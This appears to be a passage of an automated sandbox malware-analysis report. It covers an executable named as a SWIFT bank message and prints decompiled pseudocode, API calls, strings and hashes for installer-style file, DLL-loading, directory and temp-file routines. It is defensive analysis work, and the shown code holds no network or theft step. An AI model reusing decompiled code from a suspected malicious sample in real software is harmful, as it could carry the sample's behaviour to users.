Opcode Fuzzy Hash: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
Instruction Fuzzy Hash: 85515A71900219EBDB10CF69DA84B9E7FA8AF45366F14417BEC14B72C0C778DA50CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00402644(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
				_t66 = E00402C15(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x3c) = 0x3ff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x30) = __ebx;
						 *(__ebp - 0x10) = E004061E2(__ecx, __esi);
						if( *(__ebp - 0x3c) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405E55( *(__ebp - 0x10), __ebx) >= 0) {
										__eax = __ebp - 0x44;
										if(E00405DF7( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x38;
									_push(__ebx);
									_push(__ebp - 0x38);
									__eax = 2;
									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x38);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x48) = __ecx;
											 *(__ebp - 0x44) = __eax;
											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004061C9( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x44 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x44);
												} else {
													__esi =  *(__ebp - 0x48);
													__esi =  ~( *(__ebp - 0x48));
													while(1) {
														_t22 = __ebp - 0x38;
														 *_t22 =  *(__ebp - 0x38) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x44) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
														__esi = __esi + 1;
														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, 1); // executed
														__ebp - 0x44 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x30) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x00402644
0x00402646
0x00402649
0x0040264b
0x0040264e
0x00402653
0x00402657
0x0040265a
0x0040265d
0x00402abf
0x00402ac2
0x00402663
0x00402663
0x0040266a
0x0040266c
0x0040266c
0x00402672
0x004027d6
0x004027d6
0x004027d9
0x004027de
0x004015b6
0x00402885
0x00402885
0x00000000
0x00402678
0x00402679
0x00402684
0x00402687
0x00402693
0x00402697
0x0040272f
0x00402747
0x00402757
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040269d
0x0040269d
0x004026a0
0x004026a1
0x004026a4
0x004026a9
0x004026b0
0x004026b8
0x00000000
0x004026be
0x004026be
0x004026c3
0x00000000
0x004026c9
0x004026c9
0x004026d1
0x004026d4
0x004026d7
0x00402792
0x00402799
0x004026dd
0x004026e3
0x004026ef
0x00402759
0x00402759
0x004026f1
0x004026f1
0x004026f4
0x004026f6
0x004026f6
0x004026f6
0x004026f9
0x004026fe
0x00402701
0x00000000
0x00000000
0x00402703
0x00402706
0x0040270e
0x0040271a
0x00402728
0x00000000
0x0040272a
0x00000000
0x0040272a
0x00000000
0x00402728
0x004026f6
0x0040275c
0x0040275f
0x00000000
0x00402761
0x00402766
0x004027a7
0x004027c9
0x004027d0
0x004027b5
0x004027b5
0x004027b8
0x004027bb
0x004027be
0x004027be
0x00000000
0x0040276f
0x0040276f
0x00402772
0x00402775
0x0040277b
0x0040277f
0x00402782
0x00000000
0x00000000
0x00000000
0x00000000
0x00402782
0x00402766
0x0040275f
0x004026d7
0x004026c3
0x004026b8
0x00000000
0x00402784
0x00402784
0x00402787
0x00402790
0x00000000
0x00402687
0x00402672
0x00402ac8
0x00402ace

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724

Part of subcall function 00405E55: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E6B

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0

Strings

9, xrefs: 00402693

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
Instruction ID: 4c47c5b6e7001fd487639b42c981b506dedcea616f9f6d447a3608767ea6fa5a
Opcode Fuzzy Hash: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
Instruction Fuzzy Hash: 8351E575D1021AABDF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58

Uniqueness

Uniqueness Score: -1.00%

Function 004065EC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004065EC(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x00406603
0x0040660c
0x0040660e
0x0040660e
0x00406612
0x00406625
0x0040661f
0x0040661f
0x0040661f
0x0040663e
0x00406652
0x00406659

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
wsprintfW.USER32 ref: 0040663E
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406652

Strings

%s%S.dll, xrefs: 00406638
\, xrefs: 00406614
UXTHEME, xrefs: 004065F5

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: 71749ee66451d02820e1787a81c679d49f65c12e6a5790e59d0bd58148e6f3af
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: 64F021705001196BCF10AB64DD0DFAB3B5CA700304F10487AA546F11D1EBBDDA65CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004057B5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004057B5(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f0;
				_v36.Group = 0x4083f0;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e0;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x004057c0
0x004057c4
0x004057c7
0x004057cd
0x004057d1
0x004057d5
0x004057dd
0x004057e4
0x004057ea
0x004057f1
0x004057f8
0x00405800
0x00405802
0x00000000
0x00405802
0x0040580c
0x00405813
0x00405829
0x00000000
0x00000000
0x00000000
0x0040582b
0x0040582f

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
GetLastError.KERNEL32 ref: 0040580C
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405821
GetLastError.KERNEL32 ref: 0040582B

Strings

C:\Users\user\Desktop, xrefs: 004057B5

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-3370423016
Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction ID: 81d47e77b106c5c69b6f53bab6ade4ced08fad65239eb4e1eedbceb886e7a33c
Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction Fuzzy Hash: 8C01E5B2C00619DADF009FA1D9487EFBFB8EB14354F00803AD945B6281E7789618CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405DA3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405DA3(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a55c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00405da9
0x00405daf
0x00405db0
0x00405db0
0x00405db5
0x00405db6
0x00405db9
0x00405dbe
0x00405dc1
0x00405dcb
0x00405dd8
0x00405ddc
0x00405de4
0x00000000
0x00000000
0x00405de8
0x00000000
0x00405dea
0x00405dea
0x00405dea
0x00405ded
0x00405df0
0x00405df0
0x00405df3
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405DC1
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe",00403371,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76203420,004035BF), ref: 00405DDC

Strings

nsa, xrefs: 00405DB0
"C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe", xrefs: 00405DA3
C:\Users\user\AppData\Local\Temp\, xrefs: 00405DA8, 00405DAC

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3321352114
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: 0c0ec814c80ab85915f41b1413265c2d813ce01cabb3ac5407dd3af97de42ecd
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: 99F03076600304FFEB009F69DD09E9BB7A9EF95710F11803BE900E7250E6B199549B64

Uniqueness

Uniqueness Score: -1.00%

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
				_push(1); // executed
				_t34 = E10001B18(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002286(_t50);
					}
					_push(_t50);
					E100022D0(_t65);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100024A4(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x1018; // 0x1018
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100015B4(_t50);
								_t15 = _t50 + 0x1018; // 0x1018
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
								 *_t70 = 4;
								E100024A4(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100024A4(_t50);
							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E10002467(_t50);
							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x1008);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
								_t34 = E1000153D( *0x10004068);
							}
						}
						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002B57(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E1000289C(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002640(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x10001759
0x10001759
0x10001759
0x10001763
0x1000176b
0x10001778
0x10001786
0x10001789
0x1000178b
0x10001790
0x10001795
0x100018a8
0x100018a8
0x1000179b
0x1000179f
0x100017a2
0x100017a7
0x100017a8
0x100017a9
0x100017af
0x100017b5
0x100017e5
0x100017ec
0x10001810
0x1000184f
0x10001812
0x10001812
0x10001813
0x10001816
0x1000181c
0x10001820
0x10001823
0x10001828
0x10001828
0x1000182f
0x10001835
0x1000183b
0x10001847
0x10001848
0x1000184b
0x100017ee
0x100017ef
0x10001804
0x10001804
0x10001859
0x1000185c
0x10001869
0x10001870
0x10001878
0x1000187b
0x1000187b
0x10001878
0x10001888
0x10001890
0x10001895
0x10001888
0x1000189d
0x00000000
0x1000189f
0x00000000
0x100018a0
0x1000189d
0x100017b9
0x100017bc
0x100017da
0x00000000
0x00000000
0x100017dd
0x100017e2
0x100017e2
0x100017e4
0x00000000
0x100017e4
0x100017be
0x100017bf
0x100017c7
0x100017c8
0x00000000
0x100017c8
0x100017c1
0x100017c2
0x100017d0
0x00000000
0x100017d0
0x100017c5
0x00000000
0x00000000
0x00000000
0x100017c5

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNEL32(00000000), ref: 100018A0

Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8

Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000001.00000002.7936337323.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.7936306097.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.7936376155.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.7936411270.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761

Uniqueness

Uniqueness Score: -1.00%

Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00401C19(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402C15(3);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 - 0x10) = _t29;
				_t30 = E00402C15(4);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x10)) = E00402C37(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402C37(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402C37();
					_t32 = E00402C37();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
					goto L10;
				} else {
					_t61 = E00402C15();
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t41 = E00402C15(2);
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x30) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0x30));
					E004061C9();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c19
0x00401c1b
0x00401c22
0x00401c25
0x00401c28
0x00401c32
0x00401c36
0x00401c39
0x00401c42
0x00401c42
0x00401c45
0x00401c49
0x00401c52
0x00401c52
0x00401c55
0x00401c59
0x00401c5b
0x00401cb0
0x00401cb2
0x00401cbd
0x00401cc7
0x00401cca
0x00401cca
0x00401cd3
0x00000000
0x00401c5d
0x00401c64
0x00401c66
0x00401c69
0x00401c6f
0x00401c76
0x00401c79
0x00401ca1
0x00401cd9
0x00401cd9
0x00401c7b
0x00401c89
0x00401c91
0x00401c94
0x00401c94
0x00401c79
0x00401cdc
0x00401cdf
0x00401ce5
0x00402a65
0x00402a65
0x00402ac2
0x00402ace

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1

Strings

!, xrefs: 00401C55

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
